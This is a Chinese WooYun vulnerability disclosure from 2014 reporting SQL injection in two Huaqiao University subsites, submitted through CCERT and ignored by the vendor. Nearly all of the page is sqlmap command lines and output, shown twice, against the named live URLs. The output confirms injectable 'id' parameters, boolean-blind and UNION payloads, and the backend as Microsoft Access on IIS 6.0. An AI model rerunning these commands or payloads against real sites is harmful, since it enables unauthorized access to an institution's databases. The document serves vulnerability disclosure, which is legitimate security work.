当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080814

漏洞标题:华侨大学分站多处存在SQL注入

相关厂商:CCERT教育网应急响应组

漏洞作者: 龍 、

提交时间:2014-10-27 13:02

修复时间:2014-11-01 13:04

公开时间:2014-11-01 13:04

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-27: 细节已通知厂商并且等待厂商处理中
2014-11-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

分站多处存在SQL注入

详细说明:

第一处 wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18

D:\sqlmap>sqlmap.py -u wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:39:49
[10:39:49] [INFO] testing connection to the target URL
[10:39:50] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[10:39:51] [INFO] target URL is stable
[10:39:51] [INFO] testing if GET parameter 'id' is dynamic
[10:39:52] [INFO] heuristics detected web page charset 'GB2312'
[10:39:52] [INFO] confirming that GET parameter 'id' is dynamic
[10:39:53] [WARNING] GET parameter 'id' does not appear dynamic
[10:39:53] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[10:39:53] [INFO] testing for SQL injection on GET parameter 'id'
[10:39:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:39:54] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[10:40:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[10:40:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:40:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[10:40:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[10:40:01] [INFO] testing 'MySQL inline queries'
[10:40:01] [INFO] testing 'PostgreSQL inline queries'
[10:40:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[10:40:02] [INFO] testing 'Oracle inline queries'
[10:40:02] [INFO] testing 'SQLite inline queries'
[10:40:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:40:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[10:40:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[10:40:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:40:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:40:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[10:40:03] [INFO] testing 'Oracle AND time-based blind'
[10:40:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:40:04] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[10:40:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[10:40:28] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. '--flush-session --tec
hnique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec
=2')
[10:40:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:40:34] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[10:40:56] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[10:41:01] [INFO] checking if the injection point on GET parameter 'id' is a fal
se positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 79 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=18 AND 4361=4361
---
[10:41:05] [INFO] testing MySQL
[10:41:06] [WARNING] the back-end DBMS is not MySQL
[10:41:06] [INFO] testing Oracle
[10:41:06] [WARNING] the back-end DBMS is not Oracle
[10:41:06] [INFO] testing PostgreSQL
[10:41:06] [WARNING] the back-end DBMS is not PostgreSQL
[10:41:06] [INFO] testing Microsoft SQL Server
[10:41:06] [WARNING] the back-end DBMS is not Microsoft SQL Server
[10:41:06] [INFO] testing SQLite
[10:41:07] [WARNING] the back-end DBMS is not SQLite
[10:41:07] [INFO] testing Microsoft Access
[10:41:07] [INFO] confirming Microsoft Access
[10:41:08] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:41:08] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 83 times
[10:41:08] [INFO] fetched data logged to text files under 'D:\sqlmap\output\wxy.
hqu.edu.cn'
[*] shutting down at 10:41:08


D:\sqlmap>sqlmap.py -u wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18 --is-dba
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:42:54
[10:42:55] [INFO] resuming back-end DBMS 'microsoft access'
[10:42:55] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=18 AND 4361=4361
---
[10:42:55] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:42:55] [WARNING] on Microsoft Access it is not possible to test if current u
ser is DBA
current user is DBA: None
[10:42:55] [INFO] fetched data logged to text files under 'D:\sqlmap\output\wxy.
hqu.edu.cn'


第二处 stud.hqu.edu.cn/xscgz/ok/qicais.asp?id=7998

D:\sqlmap>sqlmap.py -u stud.hqu.edu.cn/xscgz/ok/qicais.asp?id=7998
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:52:37
[10:52:38] [INFO] resuming back-end DBMS 'microsoft access'
[10:52:38] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=7998 AND 2949=2949
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: id=-3756 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(107)&CHR(100)&CHR(
104)&CHR(113)&CHR(82)&CHR(100)&CHR(78)&CHR(97)&CHR(84)&CHR(118)&CHR(102)&CHR(69)
&CHR(122)&CHR(97)&CHR(113)&CHR(109)&CHR(104)&CHR(106)&CHR(113),NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessOb
jects%16
---
[10:52:38] [INFO] the back-end DBMS is Microsoft Access
back-end DBMS: Microsoft Access


漏洞证明:

第一处 wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18

D:\sqlmap>sqlmap.py -u wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:39:49
[10:39:49] [INFO] testing connection to the target URL
[10:39:50] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[10:39:51] [INFO] target URL is stable
[10:39:51] [INFO] testing if GET parameter 'id' is dynamic
[10:39:52] [INFO] heuristics detected web page charset 'GB2312'
[10:39:52] [INFO] confirming that GET parameter 'id' is dynamic
[10:39:53] [WARNING] GET parameter 'id' does not appear dynamic
[10:39:53] [WARNING] heuristic (basic) test shows that GET parameter 'id' might
not be injectable
[10:39:53] [INFO] testing for SQL injection on GET parameter 'id'
[10:39:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:39:54] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[10:40:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[10:40:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:40:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[10:40:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[10:40:01] [INFO] testing 'MySQL inline queries'
[10:40:01] [INFO] testing 'PostgreSQL inline queries'
[10:40:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[10:40:02] [INFO] testing 'Oracle inline queries'
[10:40:02] [INFO] testing 'SQLite inline queries'
[10:40:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:40:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[10:40:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[10:40:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:40:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:40:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[10:40:03] [INFO] testing 'Oracle AND time-based blind'
[10:40:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:40:04] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[10:40:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[10:40:28] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. '--flush-session --tec
hnique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec
=2')
[10:40:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:40:34] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[10:40:56] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[10:41:01] [INFO] checking if the injection point on GET parameter 'id' is a fal
se positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 79 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=18 AND 4361=4361
---
[10:41:05] [INFO] testing MySQL
[10:41:06] [WARNING] the back-end DBMS is not MySQL
[10:41:06] [INFO] testing Oracle
[10:41:06] [WARNING] the back-end DBMS is not Oracle
[10:41:06] [INFO] testing PostgreSQL
[10:41:06] [WARNING] the back-end DBMS is not PostgreSQL
[10:41:06] [INFO] testing Microsoft SQL Server
[10:41:06] [WARNING] the back-end DBMS is not Microsoft SQL Server
[10:41:06] [INFO] testing SQLite
[10:41:07] [WARNING] the back-end DBMS is not SQLite
[10:41:07] [INFO] testing Microsoft Access
[10:41:07] [INFO] confirming Microsoft Access
[10:41:08] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:41:08] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 83 times
[10:41:08] [INFO] fetched data logged to text files under 'D:\sqlmap\output\wxy.
hqu.edu.cn'
[*] shutting down at 10:41:08


D:\sqlmap>sqlmap.py -u wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18 --is-dba
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:42:54
[10:42:55] [INFO] resuming back-end DBMS 'microsoft access'
[10:42:55] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=18 AND 4361=4361
---
[10:42:55] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:42:55] [WARNING] on Microsoft Access it is not possible to test if current u
ser is DBA
current user is DBA: None
[10:42:55] [INFO] fetched data logged to text files under 'D:\sqlmap\output\wxy.
hqu.edu.cn'


第二处 stud.hqu.edu.cn/xscgz/ok/qicais.asp?id=7998

D:\sqlmap>sqlmap.py -u stud.hqu.edu.cn/xscgz/ok/qicais.asp?id=7998
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:52:37
[10:52:38] [INFO] resuming back-end DBMS 'microsoft access'
[10:52:38] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=7998 AND 2949=2949
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: id=-3756 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(107)&CHR(100)&CHR(
104)&CHR(113)&CHR(82)&CHR(100)&CHR(78)&CHR(97)&CHR(84)&CHR(118)&CHR(102)&CHR(69)
&CHR(122)&CHR(97)&CHR(113)&CHR(109)&CHR(104)&CHR(106)&CHR(113),NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessOb
jects%16
---
[10:52:38] [INFO] the back-end DBMS is Microsoft Access
back-end DBMS: Microsoft Access


修复方案:

版权声明:转载请注明来源 龍 、@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-01 13:04

厂商回复:

最新状态:

暂无